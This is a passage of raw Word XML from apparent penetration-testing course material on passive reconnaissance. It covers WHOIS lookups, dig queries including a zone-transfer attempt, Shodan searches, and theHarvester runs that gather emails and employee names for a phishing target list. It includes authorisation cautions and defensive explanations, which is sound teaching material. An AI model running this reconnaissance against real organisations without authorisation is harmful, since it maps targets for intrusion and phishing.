              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">filetype:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">inurl:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> remain reliable. Always treat dorking as one source among several, and confirm findings another way when possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✗ Common Mistake</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Running dorks against a target's domain </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">before</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> the engagement is formally authorised is still reconnaissance against that organisation — confirm the engagement has started and the scope covers OSINT before beginning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 WHOIS Lookups</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WHOIS lookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals a domain's registrar, creation and expiry dates, name servers, and — unless privacy-protected — the registrant's contact details. Registrant names and emails can feed a social-engineering profile; name servers reveal the hosting/DNS provider. Most registrars now mask personal details behind a privacy proxy, so you will usually see the proxy's details instead of the real owner.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">whois target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">whois target.com | grep -i "registrar"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 DNS Record Types and Querying</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1949"/>
        <w:gridCol w:w="7797"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Record</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Reveals</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Maps a hostname to an IPv4 address — the core building block for finding live hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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MX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Identifies the mail servers for a domain, revealing email infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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NS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Lists the authoritative name servers — who manages DNS resolution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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TXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Free-form text used for SPF/DKIM/DMARC policies and domain verification tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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AXFR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (zone transfer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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If misconfigured, a DNS server hands over its entire zone — every subdomain and internal record it holds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">dig target.com A</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">dig target.com MX</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">dig target.com NS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">dig target.com TXT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">dig axfr target.com @ns1.target.com</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nslookup -type=MX target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">□ Illustrative Output (not an actual captured run)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; &lt;&lt;&gt;&gt; DiG 9.18 &lt;&lt;&gt;&gt; target.com A</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">;; ANSWER SECTION:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">target.com.        300   IN   A   192.0.2.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Why a zone transfer is a security risk (observation question)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A successful AXFR response hands the attacker a complete map of every internal and external hostname in the domain in one request — information that would otherwise take dozens of guesses to collect. This reveals the internal naming scheme and can expose hosts never meant to be public (e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">backup-db.target.com</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">). This is why production DNS servers must restrict zone transfers to trusted secondary name servers only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Shodan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shodan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a search engine that continuously scans the internet and stores banners from open ports — web servers, webcams, industrial control systems, databases, routers and more. Because you are querying Shodan's existing database instead of scanning the target yourself, no traffic reaches the target's network, which is why Shodan searches count as passive reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">org:"Target Corp"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">hostname:target.com port:3389</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">product:"Apache httpd" org:"Target Corp"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6 theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">theHarvester</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automates the collection of emails, subdomains, hostnames, open ports and employee names from public sources — search engines, certificate transparency logs, Shodan and LinkedIn — in a single pass. It builds an initial attack-surface map and a phishing target list without sending a packet to the target.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">theHarvester -d target.com -b all</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">theHarvester -d target.com -b google,crtsh -f report.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key options: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
